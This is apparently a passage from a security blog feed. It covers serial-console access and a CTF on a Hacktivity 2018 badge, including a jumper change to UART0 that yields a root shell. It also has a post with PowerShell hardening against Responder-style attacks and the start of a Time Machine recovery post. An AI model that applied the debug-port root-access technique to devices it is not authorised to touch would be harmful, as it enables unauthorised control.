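# Assumptions (mine, not the post's): 9600 baud and 8n1 as defaults, and a
# 120-second capture window, slightly longer than the ~90 s boot time.
set -eu

# framing_to_stty FRAMING
# "8n1" -> "cs8 -parenb -cstopb", "7e1" -> "cs7 parenb -parodd -cstopb",
# "8o2" -> "cs8 parenb parodd cstopb". Fails on anything else.
framing_to_stty() {
    f=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    case "$f" in
        [5678][noe][12]) ;;
        *) return 1 ;;
    esac
    bits=${f%??}        # first character: data bits
    rest=${f#?}
    parity=${rest%?}    # n / e / o
    stop=${rest#?}      # 1 / 2
    out="cs$bits"
    case "$parity" in
        n) out="$out -parenb" ;;
        e) out="$out parenb -parodd" ;;
        o) out="$out parenb parodd" ;;
    esac
    case "$stop" in
        1) out="$out -cstopb" ;;
        2) out="$out cstopb" ;;
    esac
    printf '%s\n' "$out"
}

# Linux stty addresses a device with -F, macOS/BSD stty with -f.
stty_device_flag() {
    case "$(uname -s)" in
        Linux) printf '%s\n' '-F' ;;
        *)     printf '%s\n' '-f' ;;
    esac
}

# capture_serial DEVICE BAUD FRAMING OUTFILE [SECONDS]
# Puts the port in raw mode (no echo, no line editing) and logs everything
# the badge sends for SECONDS seconds. Start it, then replug the badge.
capture_serial() {
    dev="$1"; baud="$2"; framing="$3"; out="$4"; secs="${5:-120}"
    flags=$(framing_to_stty "$framing") || { echo "bad framing: $framing" >&2; return 1; }
    # Hold the device open on fd 3: on macOS the settings are dropped when
    # the last descriptor closes, so stty and cat must share an open port.
    exec 3< "$dev"
    # shellcheck disable=SC2086  # $flags is deliberately word-split
    stty "$(stty_device_flag)" "$dev" "$baud" $flags raw -echo
    cat <&3 > "$out" &
    reader=$!
    sleep "$secs"
    kill "$reader" 2>/dev/null || true
    wait "$reader" 2>/dev/null || true
    exec 3<&-
    printf 'captured %s bytes to %s\n' "$(wc -c < "$out" | tr -d ' ')" "$out"
}

# Stand-alone use: sh capture_badge.sh /dev/ttyUSB0 9600 8n1 badge.log 120
if [ "${1:-}" ]; then
    capture_serial "$1" "${2:-9600}" "${3:-8n1}" "${4:-badge.log}" "${5:-120}"
fi
```

<div style="text-align: justify;">
If the capture file stays empty at 9600 baud, rerun with another rate from the list above; garbage characters rather than silence usually mean the baud rate is wrong, while silence usually means you missed the boot window.</div>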
<h3>
Windows</h3>
<div>
When you connect the device to Windows, you will be greeted with a pop-up.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGYApDq3aAIybjNgLo6RAjmyCPpGKdbl9VOEV0p3uhxxc5R2db2vK8lXbmNXeZGLZl4-2Qu8M48QZ9h2FH_SUOyRHzRXPI2SB3pfi0z7tBn1adG_5KyYqcE_xfc37XQixQMySAZG9n3DT8/s1600/Screen+Shot+2019-09-16+at+17.52.32.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="124" data-original-width="488" height="101" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGYApDq3aAIybjNgLo6RAjmyCPpGKdbl9VOEV0p3uhxxc5R2db2vK8lXbmNXeZGLZl4-2Qu8M48QZ9h2FH_SUOyRHzRXPI2SB3pfi0z7tBn1adG_5KyYqcE_xfc37XQixQMySAZG9n3DT8/s400/Screen+Shot+2019-09-16+at+17.52.32.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Just click on the popup and you will see the COM port number the device is connected to:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggmq_h_QZ4ZBlLabUde8Masf_omDtBZOstuW1gyqc74l-MwIw2jSaPlvdB7WMJteLb_vORNajtZWez0U4PToDOMH1NS_48YgZFH0UwB6m285VJ1pGjLvpc4QVctL8iva3izEM4zQDWHEQp/s1600/Screen+Shot+2019-09-16+at+17.52.55.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="269" data-original-width="663" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggmq_h_QZ4ZBlLabUde8Masf_omDtBZOstuW1gyqc74l-MwIw2jSaPlvdB7WMJteLb_vORNajtZWez0U4PToDOMH1NS_48YgZFH0UwB6m285VJ1pGjLvpc4QVctL8iva3izEM4zQDWHEQp/s400/Screen+Shot+2019-09-16+at+17.52.55.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
In this case, it is connected to COM3. So let's fire up our favorite putty.exe, select Serial, choose COM3, add speed 9600, and you are ready to go!</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdMMszWjTBPxPHME5dTTDn3MFZuOk7lAg56P8E15n2noP03WtXVhd6zb6o6BXWIbkN2TeV5ethewLOL8-qIWUUk5AMycxOxLfl06OAXSDf0ODeFtH1KRmhnGp5lFTu7g4D8iNmZsBFkzKG/s1600/Screen+Shot+2019-09-16+at+18.22.04.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="308" data-original-width="710" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdMMszWjTBPxPHME5dTTDn3MFZuOk7lAg56P8E15n2noP03WtXVhd6zb6o6BXWIbkN2TeV5ethewLOL8-qIWUUk5AMycxOxLfl06OAXSDf0ODeFtH1KRmhnGp5lFTu7g4D8iNmZsBFkzKG/s400/Screen+Shot+2019-09-16+at+18.22.04.png" width="400" /></a></div>
<br />
You might check the end of the macOS section in case you can't see anything. Timing is everything.<br />
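The same connection done from PowerShell instead of putty.exe, as an added example that is not part of the original post: it opens COM3 at 9600 8n1 as described above and keeps reading through the ~90 second boot until the badge menu arrives. The function and parameter names are my own.<br />

```powershell
# Added example: read the badge's greeting over the serial port from PowerShell.
# Assumes the badge enumerated as COM3 at 9600 baud, 8n1 (as shown above);
# function and parameter names are mine, not part of the badge firmware.

function Get-BadgeSerialPorts {
    # Lists the COM ports Windows currently knows about (same name the pop-up shows).
    [System.IO.Ports.SerialPort]::GetPortNames()
}

function Read-BadgeBanner {
    param(
        [string]$PortName = 'COM3',
        [int]$BaudRate = 9600,
        # The badge needs roughly 90 s to boot, so give it a generous window.
        [int]$TimeoutSeconds = 120
    )
    # 8n1: 8 data bits, no parity, one stop bit. Open the port BEFORE the badge
    # boots (unplug/replug it), otherwise the greeting has already gone by.
    $ctorArgs = @($PortName, $BaudRate,
                  [System.IO.Ports.Parity]::None, 8,
                  [System.IO.Ports.StopBits]::One)
    $port = New-Object System.IO.Ports.SerialPort -ArgumentList $ctorArgs
    $port.ReadTimeout = 2000   # ms per ReadLine before a TimeoutException
    $port.NewLine = "`n"
    $port.Open()
    $lines = New-Object System.Collections.Generic.List[string]
    try {
        $deadline = (Get-Date).AddSeconds($TimeoutSeconds)
        while ((Get-Date) -lt $deadline) {
            try {
                $line = $port.ReadLine().TrimEnd("`r")
                $lines.Add($line)
                Write-Host $line
                # The menu ends with the prompt asking for a challenge number.
                if ($line -like 'Enter the number of the challenge*') { break }
            } catch [System.TimeoutException] {
                # Nothing arrived in the last 2 s: the badge is still booting.
            }
        }
    } finally {
        $port.Close()
    }
    return $lines
}

# Usage: run Get-BadgeSerialPorts to confirm the port, replug the badge,
# then Read-BadgeBanner -PortName COM3 -BaudRate 9600
```

For the UART0 root console described further down, call it with -BaudRate 115200 instead.<br />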
<br />
<h2>
The CTF</h2>
<pre>Welcome to the Hacktivity 2018 badge challenge!
This challenge consists of several tasks with one or more levels of
difficulty. They are all connected in some way or another to HW RE
and there's no competition, the whole purpose is to learn things.
Note: we recommend turning on local echo in your terminal!
Also, feel free to ask for hints at the Hackcenter!
Choose your destiny below:
1. Visual HW debugging
2. Reverse engineering
3. RF hacking
4. Crypto protection
Enter the number of the challenge you're interested in and press [
</pre>
</div>
</div>
<div style="text-align: justify;">
Excellent, now you are ready to hack this! In case you are lost in controlling the screen command, go to <a href="https://linuxize.com/post/how-to-use-linux-screen/">https://linuxize.com/post/how-to-use-linux-screen/</a>.<br />
<br />
I will not spoil any fun in giving out the challenge solutions here. It is still your task to find solutions for these.<br />
<br />
But here is a catch. You can get a root shell on the device. And it is pretty straightforward. Just carefully remove the Omega shield from the badge. Now you see two jumpers; by default, these are connected together as UART1. As seen below.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3FszdUYyi2KMczJGDKORKryFNuIODRYo9AtcbAEluBRNEU83NcM1WPipEHPb7KYDNB1uROVBycEES4ueq3aofIiBH4iv6f1ldTBuh1CCmddcSPKUZ9JnjrbLciHbjSv-v03jAyDOgAky4/s1600/IMG_8641.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="1200" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3FszdUYyi2KMczJGDKORKryFNuIODRYo9AtcbAEluBRNEU83NcM1WPipEHPb7KYDNB1uROVBycEES4ueq3aofIiBH4iv6f1ldTBuh1CCmddcSPKUZ9JnjrbLciHbjSv-v03jAyDOgAky4/s400/IMG_8641.JPG" width="300" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
But what happens if you move these jumpers to UART0? Guess what, you can get a root shell! This is what I call privilege escalation on the HW level :) But first, let's connect the Omega shield back. Also, for added fun, this new interface speaks at 115200 baud, so you should change your screen parameters to 115200. Also, the new interface has a different ID under /dev, but I am sure you can figure this out from now on.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="1600" data-original-width="1200" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizXtKiw6ccyN7Xnw9V_ahDfhF64mlH0APhFiNYHxggejIZXeRmb35SOO39hcJtGGJp3T3qfzuD8ZEK3AB6BGmiph8weH72JJSs8-qtRN2cGoTH59vSenoeTKrZtO37Oryavu_mdnnBUXdx/s400/IMG_8642.JPG" width="300" /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: justify;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;">If you connect to the device during boot time, you can see a lot of exciting debug information about the device. And after it boots, you just get a root prompt. Woohoo! </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;">But what can you do with this root access? Well, for starters, how about running </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;"># strings hello | less</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;">From now on, you are on your own to hack this badge. Happy hacking.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;">Big thanks to <a href="https://twitter.com/0xmaro" target="_blank">Attila Marosi-Bauer</a> and <a href="https://hsbp.org/HomePage" target="_blank">Hackerspace Budapest</a> for developing this badge and the contests.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;">PS: In case you want to use the radio functionality of the badge, see below how you should solder the parts to it. By default, you can process slow-speed radio frequency signals on GPIO19. But for higher transfer speeds, you should wire the RF module's DATA OUT pin to the free RX1 pin.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQBl7onzM8MsVju5f2iAAUJosYyupKACrIF_PkPjeC7SDl5v83puy3xL8Vk36q8ETvsEmYOIoPpebEHrQtIOXRa_g1uCKq-wDYfb3nj9fRX8pafAc1aJAapSs6vZwLMD036-g4TiHCzHjp/s1600/IMG_8638.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="1200" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQBl7onzM8MsVju5f2iAAUJosYyupKACrIF_PkPjeC7SDl5v83puy3xL8Vk36q8ETvsEmYOIoPpebEHrQtIOXRa_g1uCKq-wDYfb3nj9fRX8pafAc1aJAapSs6vZwLMD036-g4TiHCzHjp/s400/IMG_8638.JPG" width="300" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com3tag:blogger.com,1999:blog-7429675726481888518.post-3113732658797168405 2018-08-15T09:43:00.000+02:00 2019-10-08T15:31:11.294+02:00
<h2>How to build a "burner device" for DEF CON in one easy step</h2>
<div style="text-align: justify;">
TL;DR: Don't build a burner device. Probably this is not the risk you are looking for.</div>
<h3 style="text-align: justify;">
Introduction</h3>
<div style="text-align: justify;">
Every year before DEF CON people start to give <a href="https://blog.erratasec.com/2017/07/burner-laptops-for-def-con.html" target="_blank">advice</a> to attendees to bring "burner devices" to DEF CON. Some people also start to create <a href="https://github.com/CrowdStrike/travel-laptop" target="_blank">long lists</a> on how to build burner devices, especially laptops. But the deeper we look into the topic, the more confusing it gets. Why are we doing this? Why are we recommending this? Are we focusing on the right things?</div>
<h3 style="text-align: justify;">
What is a "burner device" used for?</h3>
<div style="text-align: justify;">
For starters, the whole "burner device" concept is totally misunderstood, even within the ITSEC community. A "burner device" is used for non-attribution. You know, for example, you are a spy and you don't want the country where you live to know that you are communicating with someone else. I believe this is not the situation for most attendees at DEF CON. More info about the meaning of "burner" <a href="https://twitter.com/Viss/status/877400669669306369" target="_blank">https://twitter.com/Viss/status/877400669669306369</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Burner phone means it has a throwaway SIM card with a throwaway phone, used for one specific operation only. <b>You don't use the "burner device" to log in to your e-mail account or to VPN to your work or home.</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8pOq2W4O_ltFgCWIN7PlX43bMTr62Rgzu_n0gZAu2RHPElrFw1CmD2nJCOZGG0KHUT6gEkfNEZ72bpeZnfR1_ADJIohYtSz3BuCDviO_6_p4hIYOtI6c7L8kUY9YhsvawXWAXvfNG5s7H/s1600/%2524_86.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="768" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8pOq2W4O_ltFgCWIN7PlX43bMTr62Rgzu_n0gZAu2RHPElrFw1CmD2nJCOZGG0KHUT6gEkfNEZ72bpeZnfR1_ADJIohYtSz3BuCDviO_6_p4hIYOtI6c7L8kUY9YhsvawXWAXvfNG5s7H/s400/%2524_86.JPG" width="300" /></a></div>
<div style="text-align: justify;">
But let's forget this word misuse issue for a moment, and focus on the real problem.</div>
<h3 style="text-align: justify;">
The bad advice</h3>
<div style="text-align: justify;">
The Internet is full of articles focusing on the wrong things, especially when it comes to "burner devices". Like how to build a burner laptop, without explaining why you need it or how to use it.</div>
<div style="text-align: justify;">
The problem with this approach is that people end up "burning" (lame wordplay, sorry) significant resources for building a secure "burner device". But people are not educated about how they should use these devices.</div>
<h3 style="text-align: justify;">
The threats</h3>
<div style="text-align: justify;">
I believe the following are real threats that increase when you travel:</div>
<div style="text-align: justify;">
1. The laptop getting lost or stolen.</div>
<div style="text-align: justify;">
2. The laptop getting inspected/copied at the border.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
These two risks have nothing to do with DEF CON; this is true for every trip.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Some other risks which are usually mentioned when it comes to "burner devices" and DEF CON:</div>
<div style="text-align: justify;">
3. Device getting owned via physical access while in a hotel room.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZQcPz-OvCdqMjq7Atj5jCghi7rjOKc119BN-WX8eAhHL60f9Mu7fMWvOoeMeVZ-3TxtxIRK_py_zFrqtsZyymdy_AcX_Hnl69HclIXvpOqnYy0g4ByM0HAhwrn6_xMjakKXf15MEXyzMo/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="513" data-original-width="616" height="531" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZQcPz-OvCdqMjq7Atj5jCghi7rjOKc119BN-WX8eAhHL60f9Mu7fMWvOoeMeVZ-3TxtxIRK_py_zFrqtsZyymdy_AcX_Hnl69HclIXvpOqnYy0g4ByM0HAhwrn6_xMjakKXf15MEXyzMo/s640/Capture.PNG" width="640" /></a></div>
<div style="text-align: justify;">
4. Network traffic man-in-the-middle attacked. Your password displayed on a Wall of Sheep. Or having fun with <a href="https://twitter.com/parkerschmitt/status/515415443528351744" target="_blank">Shellshock</a> with DHCP. Information leak of NTLM hashes or similar.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvepSHD0DxwOdsHvwOsrpAHfqG_jhZC1F9n7DitSm8FCAoicczZsQQ25b1i5_6ehi7jH9I_hk8fZygrn1c4L8ZghFnZRvGBXSs4SUdT3J34IhyphenhyphenBaet4HBxQpHKWM_qGjEA12MCyHrddcON/s1600/Capture2.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="598" data-original-width="679" height="351" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvepSHD0DxwOdsHvwOsrpAHfqG_jhZC1F9n7DitSm8FCAoicczZsQQ25b1i5_6ehi7jH9I_hk8fZygrn1c4L8ZghFnZRvGBXSs4SUdT3J34IhyphenhyphenBaet4HBxQpHKWM_qGjEA12MCyHrddcON/s400/Capture2.PNG" width="400" /></a></div>
<div style="text-align: justify;">
5. Pwning the device via some nasty things like WiFi/TCP/Bluetooth/LTE/3G/GSM stack. These are unicorn attacks.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh13ePLgISlZ5lt1uMEnU4lHogyaQ-O9x-tV8XEGgsQo-JG9W5xQGavFAwoYKWH8HF1bUISMVkL7hyoNqHFah6fj5HCtuPbdymJ2ftPfhlht1bXEbWS9JUvBm4JimVrSlHRLkMn0Ltfn99j/s1600/b95.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="1377" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh13ePLgISlZ5lt1uMEnU4lHogyaQ-O9x-tV8XEGgsQo-JG9W5xQGavFAwoYKWH8HF1bUISMVkL7hyoNqHFah6fj5HCtuPbdymJ2ftPfhlht1bXEbWS9JUvBm4JimVrSlHRLkMn0Ltfn99j/s320/b95.png" width="275" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
6. Pwning your device by pwning a service on your device. Like leaving your upload.php file in the root folder you use at CTFs and Nginx is set to autostart. The author of this article cannot comment on this incident whether it happened in real life or is just an imaginary example. </div>
<h3 style="text-align: justify;">
How to mitigate these risks? </h3>
<div style="text-align: justify;">
Laptop getting stolen/lost/inspected at the border?</div>
<div style="text-align: justify;">
1. Bring a cheap, empty device with you. Or set up a fake OS/fake account to log in if you really need your day-to-day laptop. This dummy account should not decrypt the real files in the real account.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMmGAmD3f_JKhXKtdhBD70APpCce3vaYdB5M6Qz5g_HyLJ88DCHIC0YTRvBvb2LvawCW91htiCHvdlmyWcIwDp0LDIGq7RxywNbJX6tjbh8xxB9PXdL4JMy051yMAFW1PCW71s0OVxwgKY/s1600/c05916387.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="430" data-original-width="573" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMmGAmD3f_JKhXKtdhBD70APpCce3vaYdB5M6Qz5g_HyLJ88DCHIC0YTRvBvb2LvawCW91htiCHvdlmyWcIwDp0LDIGq7RxywNbJX6tjbh8xxB9PXdL4JMy051yMAFW1PCW71s0OVxwgKY/s640/c05916387.png" width="640" /></a></div>
<h4 style="text-align: justify;">
Device getting owned while in a hotel room with physical access</h4>
<div style="text-align: justify;">
1. Don't bring any device with you.</div>
<div style="text-align: justify;">
2. If you bring any, make it tamper-resistant. How to do that depends on your enemy, but you can start by using nail glitter and Full Disk Encryption. Tools like Do Not Disturb help. It also helps if your OS supports suspending DMA devices before the user logs in.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR3SyrVswphXIRO6OLgkPKiZqNKREYytSxP6eQz3jbdz4LDpRdMOTaRriZtJhyphenhyphenPScMNV2QQMA4PEf_L3wda5fNOvVR_34mBdYRXxbDwYNJENKSIUp6MNW2Lh4uEsftFIESQELzrB06wKro/s1600/tamper_4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="688" data-original-width="1020" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR3SyrVswphXIRO6OLgkPKiZqNKREYytSxP6eQz3jbdz4LDpRdMOTaRriZtJhyphenhyphenPScMNV2QQMA4PEf_L3wda5fNOvVR_34mBdYRXxbDwYNJENKSIUp6MNW2Lh4uEsftFIESQELzrB06wKro/s400/tamper_4.png" width="400" /></a></div>
<div style="text-align: justify;">
3. If you can't make the device tamper-resistant, use a device that has a good defense against physical attackers, like iOS.</div>
<div style="text-align: justify;">
4. Probably you are not important enough for anyone to spend time and resources on you. If they do, all the hardening will probably only make your life miserable, and you will still get pwned.</div>
<h4 style="text-align: justify;">
Network traffic Man-in-the-middle attacked</h4>
<div style="text-align: justify;">
1. Don't bring any device with you.</div>
<div style="text-align: justify;">
2. Use services that are protected against MiTM. Like TLS.</div>
<div style="text-align: justify;">
3. Update your OS to the latest and greatest versions. Not everyone at DEF CON has a 0day worth 100K USD, and even the ones who have one won't waste it on you. </div>
<div style="text-align: justify;">
4. Use fail-safe VPN. Unfortunately, not many people talk about this or have proper solutions for the most popular operating systems.</div>
<div style="text-align: justify;">
5. For specific attacks like Responder, disable <a href="http://www.pciqsatalk.com/2016/03/disable-lmnr-netbios.html" target="_blank">LLMNR, NBT-NS</a>, <a href="https://stackoverflow.com/a/41048991" target="_blank">WPAD</a>, and <a href="https://medium.com/@JockDaRock/disabling-ipv6-on-network-adapter-windows-10-5fad010bca75" target="_blank">IPv6</a> and use a non-work account on the machine. If you don't have the privileges to do so on your machine, you probably should not bring this device with you. Or ask your local IT to disable these services and set up a new account for you.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitjFexAJVLfK35fH2_rqK6adYbxv7P_WSfNwryvTOkopDtIiTQU81lk7MFSrLxeiR7hlDI6bLld0mh6Bt4ePBgzvmM1QAWDniFsw6m_Fz_Th3AmHy9j0ym0DyxlBv0vBbp2ElAkPYpfetu/s1600/win10.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="714" data-original-width="1366" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitjFexAJVLfK35fH2_rqK6adYbxv7P_WSfNwryvTOkopDtIiTQU81lk7MFSrLxeiR7hlDI6bLld0mh6Bt4ePBgzvmM1QAWDniFsw6m_Fz_Th3AmHy9j0ym0DyxlBv0vBbp2ElAkPYpfetu/s640/win10.png" width="640" /></a></div>
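One way to apply point 5 from an elevated PowerShell prompt, as an added example that is not part of the original post. The registry locations are the ones the linked articles describe; the function names are mine, and the NetBIOS and IPv6 changes only take effect after a reboot.<br />

```powershell
# Added example: turn off the name-resolution protocols Responder abuses
# (LLMNR, NBT-NS, WPAD) and IPv6. Run from an elevated prompt; function
# names are my own, the registry values are the standard Windows ones.

function Disable-Llmnr {
    # Same value the "Turn off multicast name resolution" group policy writes.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name 'EnableMulticast' -Value 0 -Type DWord
}

function Disable-NbtNs {
    # NetbiosOptions: 0 = follow DHCP, 1 = enabled, 2 = NetBIOS over TCP/IP off.
    # Set it on every interface, including the ones currently down.
    $base = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
    Get-ChildItem -Path $base | ForEach-Object {
        Set-ItemProperty -Path $_.PSPath -Name 'NetbiosOptions' -Value 2 -Type DWord
    }
}

function Disable-Wpad {
    # Set-Service refuses to disable WinHttpAutoProxySvc on recent Windows,
    # so write Start = 4 (Disabled) directly. Also pin "wpad" in the hosts
    # file so the name can never resolve to a box on the conference network.
    $svc = 'HKLM:\SYSTEM\CurrentControlSet\Services\WinHttpAutoProxySvc'
    Set-ItemProperty -Path $svc -Name 'Start' -Value 4 -Type DWord
    $hosts = "$env:SystemRoot\System32\drivers\etc\hosts"
    if (-not (Select-String -Path $hosts -Pattern '^\s*255\.255\.255\.255\s+wpad' -Quiet)) {
        Add-Content -Path $hosts -Value '255.255.255.255 wpad'
    }
}

function Disable-IPv6 {
    # 0xFF disables every IPv6 component except loopback; needs a reboot.
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters'
    Set-ItemProperty -Path $key -Name 'DisabledComponents' -Value 0xFF -Type DWord
}

function Test-ResponderSurface {
    # Read the four settings back so the state can be checked before travelling.
    $nbt = Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces' |
        ForEach-Object { (Get-ItemProperty $_.PSPath).NetbiosOptions }
    [ordered]@{
        LLMNR_EnableMulticast   = (Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient' -ErrorAction SilentlyContinue).EnableMulticast
        NBT_NetbiosOptions      = ($nbt -join ',')
        WPAD_ServiceStart       = (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\WinHttpAutoProxySvc').Start
        IPv6_DisabledComponents = (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters' -ErrorAction SilentlyContinue).DisabledComponents
    }
}

Disable-Llmnr; Disable-NbtNs; Disable-Wpad; Disable-IPv6
Test-ResponderSurface   # expect 0 / 2,2,... / 4 / 255 after a reboot
```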
<h4 style="text-align: justify;">
Pwning the device via some nasty thing like WiFi/TCP/Bluetooth/LTE/3G/GSM stack</h4>
<div style="text-align: justify;">
1. Don't bring any device with you.</div>
<div style="text-align: justify;">
2. If you bring any, do not use this device to log in to work, personal email, social media, etc.</div>
<div style="text-align: justify;">
3. Don't worry, these things don't happen very often. </div>
<h4 style="text-align: justify;">
Pwning your device by pwning a service on your device</h4>
<div style="text-align: justify;">
Just set up a firewall profile where all services are hidden from the outside. You rarely need any service accessible on your device at a hacker conference.</div>
<h3 style="text-align: justify;">
Conclusion</h3>
<div style="text-align: justify;">
If you are still so afraid to go there, just don't go there. Watch the talks at home. But how is the hotel WiFi at a random place different from a hacker conference? <a href="https://securelist.com/the-darkhotel-apt/66779/" target="_blank">Turns out, it is not much different</a>, so you better spend time and resources on hardening your daily work devices for 365 days, instead of building a "burner device".</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
You probably need a "burner device" if you are a spy for a foreign government. Or you are the head of a criminal organization. Otherwise, you don't need a burner device. Maybe you need to bring a cheap replacement device.</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com0tag:blogger.com,1999:blog-7429675726481888518.post-3428106987232170992 2018-07-21T15:42:00.002+02:00 2019-10-08T15:32:30.047+02:00
<h2>Recovering data from an old encrypted Time Machine backup</h2>
Recovering data from a backup should be an easy thing to do. At least this is what you expect. Yesterday I had a problem which should have been easy to solve, but it was not. I hope this blog post can help others who face the same problem.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0JkKFYnSZ_eyyobIyl4hXMQilc5mr3shmwBGAs835DJES2EXonyWiOfqf35G9bjCK1rO93sWkPfLkReQFtVDK2ILHQBRdBzFDuiEAXvY5LQZ8AzfHAK0hQGdu8Bp_cfvIxiJCrz5neDZb/s1600/macos-high-sierra-system-preferences-time-machine.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="881" data-original-width="1336" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0JkKFYnSZ_eyyobIyl4hXMQilc5mr3shmwBGAs835DJES2EXonyWiOfqf35G9bjCK1rO93sWkPfLkReQFtVDK2ILHQBRdBzFDuiEAXvY5LQZ8AzfHAK0hQGdu8Bp_cfvIxiJCrz5neDZb/s400/macos-high-sierra-system-preferences-time-machine.jpg" width="400" /></a></div>
<br />
<h2>
The problem</h2>
1. I had an encrypted Time Machine backup which was not used for months<br />
2. This backup was not on an official Apple Time Capsule or on a USB HDD, but on a WD MyCloud NAS<br />
3. I needed files from this backup<br />
4. After running out of time I only had SSH access to the macOS, no GUI<br />
<br />
<h2>
The struggle</h2>
